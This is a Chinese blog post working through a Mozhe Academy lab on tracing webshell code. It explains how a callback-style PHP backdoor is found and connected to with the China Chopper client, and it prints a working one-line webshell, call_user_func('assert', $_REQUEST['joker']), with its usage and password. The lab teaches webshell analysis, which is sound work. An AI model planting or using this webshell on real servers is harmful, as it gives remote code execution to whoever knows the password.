墨者学院 - WebShell代码分析溯源(第5题)

 一个个看,,,找到该文件,经典的回调函数形式菜刀连接,ip/www/Exception.php?POST=assert密码为assert得到key关于回调函数可参考此文章https://blog.csdn.net/qq_24196029/article/details/78118680  <?phperror_reporting(0);call...
摘要由CSDN通过智能技术生成

 

一个个看,,,找到该文件,经典的回调函数形式

菜刀连接,
ip/www/Exception.php?POST=assert
密码为assert


得到key

关于回调函数可参考此文章

https://blog.csdn.net/qq_24196029/article/details/78118680

 

 

<?php
error_reporting(0);
call_user_func('assert', $_REQUEST['joker']);
?>

用法: http://www.xxx.com/4.php

菜刀连接用法: http://www.xxx.com/4.php

密码:joker

详解:call_user_func()函数把第一个参数作为回调函数调用,也就是说assert是被调用的回调函数,其余参数是回调函数的参数。

这样的话就直接构成了  assert($_REQUEST['joker']) 这样的一句话木马,直接用菜刀链接即可

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值